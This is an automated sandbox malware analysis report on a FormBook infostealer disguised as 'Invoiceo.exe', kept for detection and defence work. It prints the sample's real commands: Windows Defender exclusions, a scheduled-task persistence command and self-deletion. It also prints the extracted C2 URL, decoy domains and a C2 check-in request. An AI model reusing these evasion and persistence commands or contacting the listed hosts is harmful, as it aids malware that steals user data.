Play interactive tour

Edit tour

Analysis Report Invoiceo.exe

Overview

General Information

Sample Name:	Invoiceo.exe
Analysis ID:	402845
MD5:	8f2489d7ce50e99109af9925818daf2b
SHA1:	5481d53e59fda1e0d849b677e15b410ba6f64fbc
SHA256:	0013853950647289e952326b93ce46aa3e73db654367ef3c005e29257db31fba
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Invoiceo.exe (PID: 6316 cmdline: 'C:\Users\user\Desktop\Invoiceo.exe' MD5: 8F2489D7CE50E99109AF9925818DAF2B)

powershell.exe (PID: 6584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6716 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6856 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Invoiceo.exe (PID: 6872 cmdline: C:\Users\user\Desktop\Invoiceo.exe MD5: 8F2489D7CE50E99109AF9925818DAF2B)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 5112 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4604 cmdline: /c del 'C:\Users\user\Desktop\Invoiceo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.swim-maki.com/csi/"], "decoy": ["crazyonlineboutique.com", "nelivo.com", "chibimama-blog.com", "teachersofnyc.com", "rare-snare.com", "sunriseatlennox.com", "innovate-nation.com", "mahowebcam.com", "foodbyroyalbites.com", "nkm580.com", "premiumplanterboxes.com", "uspaypausa.com", "wto2b.com", "evoocb.com", "missilenttech.com", "adtlive.com", "guapeco.com", "keepfaithful.com", "djayhoward.com", "cora-designstj.com", "furrybasics.com", "tabuk24.com", "bioshope.online", "naturaldesiproducts.com", "ardreykellbaseball.com", "irisettlement.com", "bahama-id.com", "lastweektonight.watch", "professor-ux.com", "lifecompetitions.net", "axislnsmail.com", "dohannor.com", "powertuningfiles.com", "analistaweb.net", "baascompanies.com", "gengkakmona.com", "salonandspaexperts.com", "mynet.ltd", "lionandivy.com", "shopalam.com", "ana9aty.net", "sandostore.com", "theasigosysteminfo.com", "academiadoaprender.com", "akvirtualtours.com", "hecoldwithit.com", "stopsiba.com", "credit780.com", "ss01center.com", "wristaidmd.com", "s2nps.co.uk", "kontrey.com", "cheesecakedactory.com", "bnytechnologies.com", "enhancinggrowth.com", "gorgeus-girl-full-service.today", "bermudesfcrasettlement.com", "beste-gruppe.com", "lfntv.com", "coronarestschuldbefreiung.info", "positivechampions.com", "roadsigntoday.club", "oxytocin.online", "bupamwhub.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1dad88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1daff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2073a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x207612:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e6b15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x213135:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1e6601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x212c21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1e6c17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x213237:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1e6d8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2133af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1dba0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x20802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1e587c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x211e9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dc703:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x208d23:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ec7b7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x218dd7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed7ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1e9899:$sqlite3step: 68 34 1C 7B E1 0x1e99ac:$sqlite3step: 68 34 1C 7B E1 0x215eb9:$sqlite3step: 68 34 1C 7B E1 0x215fcc:$sqlite3step: 68 34 1C 7B E1 0x1e98c8:$sqlite3text: 68 38 2A 90 C5 0x1e99ed:$sqlite3text: 68 38 2A 90 C5 0x215ee8:$sqlite3text: 68 38 2A 90 C5 0x21600d:$sqlite3text: 68 38 2A 90 C5 0x1e98db:$sqlite3blob: 68 53 D8 7F 8C 0x1e9a03:$sqlite3blob: 68 53 D8 7F 8C 0x215efb:$sqlite3blob: 68 53 D8 7F 8C 0x216023:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Process Memory Space: Invoiceo.exe PID: 6316	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.Invoiceo.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.Invoiceo.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.Invoiceo.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
11.2.Invoiceo.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.Invoiceo.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.Invoiceo.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
0.2.Invoiceo.exe.276f578.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Invoiceo.exe.37e7df0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Invoiceo.exe.37e7df0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13bf98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13c202:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1685b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x168822:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147d25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x174345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x147811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x173e31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147e27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x174447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x147f9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1745bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13cc1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16923a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x146a8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1730ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13d913:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x169f33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14d9c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x179fe7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14e9ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Invoiceo.exe.37e7df0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x14aaa9:$sqlite3step: 68 34 1C 7B E1 0x14abbc:$sqlite3step: 68 34 1C 7B E1 0x1770c9:$sqlite3step: 68 34 1C 7B E1 0x1771dc:$sqlite3step: 68 34 1C 7B E1 0x14aad8:$sqlite3text: 68 38 2A 90 C5 0x14abfd:$sqlite3text: 68 38 2A 90 C5 0x1770f8:$sqlite3text: 68 38 2A 90 C5 0x17721d:$sqlite3text: 68 38 2A 90 C5 0x14aaeb:$sqlite3blob: 68 53 D8 7F 8C 0x14ac13:$sqlite3blob: 68 53 D8 7F 8C 0x17710b:$sqlite3blob: 68 53 D8 7F 8C 0x177233:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Invoiceo.exe' , ParentImage: C:\Users\user\Desktop\Invoiceo.exe, ParentProcessId: 6316, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp', ProcessId: 6716

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.swim-maki.com/csi/"], "decoy": ["crazyonlineboutique.com", "nelivo.com", "chibimama-blog.com", "teachersofnyc.com", "rare-snare.com", "sunriseatlennox.com", "innovate-nation.com", "mahowebcam.com", "foodbyroyalbites.com", "nkm580.com", "premiumplanterboxes.com", "uspaypausa.com", "wto2b.com", "evoocb.com", "missilenttech.com", "adtlive.com", "guapeco.com", "keepfaithful.com", "djayhoward.com", "cora-designstj.com", "furrybasics.com", "tabuk24.com", "bioshope.online", "naturaldesiproducts.com", "ardreykellbaseball.com", "irisettlement.com", "bahama-id.com", "lastweektonight.watch", "professor-ux.com", "lifecompetitions.net", "axislnsmail.com", "dohannor.com", "powertuningfiles.com", "analistaweb.net", "baascompanies.com", "gengkakmona.com", "salonandspaexperts.com", "mynet.ltd", "lionandivy.com", "shopalam.com", "ana9aty.net", "sandostore.com", "theasigosysteminfo.com", "academiadoaprender.com", "akvirtualtours.com", "hecoldwithit.com", "stopsiba.com", "credit780.com", "ss01center.com", "wristaidmd.com", "s2nps.co.uk", "kontrey.com", "cheesecakedactory.com", "bnytechnologies.com", "enhancinggrowth.com", "gorgeus-girl-full-service.today", "bermudesfcrasettlement.com", "beste-gruppe.com", "lfntv.com", "coronarestschuldbefreiung.info", "positivechampions.com", "roadsigntoday.club", "oxytocin.online", "bupamwhub.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\yYxmxiApi.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Show sources

Source: Invoiceo.exe

ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE

Source: 11.2.Invoiceo.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Invoiceo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Invoiceo.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmd.pdbUGP source: Invoiceo.exe, 0000000B.00000003.322550365.0000000000E90000.00000004.00000001.sdmp, cmd.exe, 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoiceo.exe, 0000000B.00000002.334267380.000000000123F000.00000040.00000001.sdmp, cmd.exe, 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Invoiceo.exe, 0000000B.00000002.334267380.000000000123F000.00000040.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb source: Invoiceo.exe, 0000000B.00000003.322550365.0000000000E90000.00000004.00000001.sdmp, cmd.exe

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0034245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	26_2_0034245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003468BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	26_2_003468BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	26_2_0033B89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003385EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	26_2_003385EA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003531DC FindFirstFileW,FindNextFileW,FindClose,	26_2_003531DC

Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 4x nop then pop ebx		11_2_00407AFA
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 4x nop then pop edi		11_2_00417D66

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 154.207.58.218:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 154.207.58.218:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 154.207.58.218:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.swim-maki.com/csi/

Source: global traffic

HTTP traffic detected: GET /csi/?TTgLKx=uFNDtp4H1nDLCVd&mR-ptRI=N6ynhade2rGTzfH7Obdga9j8h7xnVmduHv/FNLw2V1/oBiufSguui3vD99XwSD3G2mHh HTTP/1.1Host: www.tabuk24.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.tabuk24.com

Source: explorer.exe, 0000000D.00000000.295505046.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.405129582.0000000004931000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.adtlive.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.adtlive.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.adtlive.com/csi/www.rare-snare.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.adtlive.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.analistaweb.net
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.analistaweb.net/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.analistaweb.net/csi/www.kontrey.com
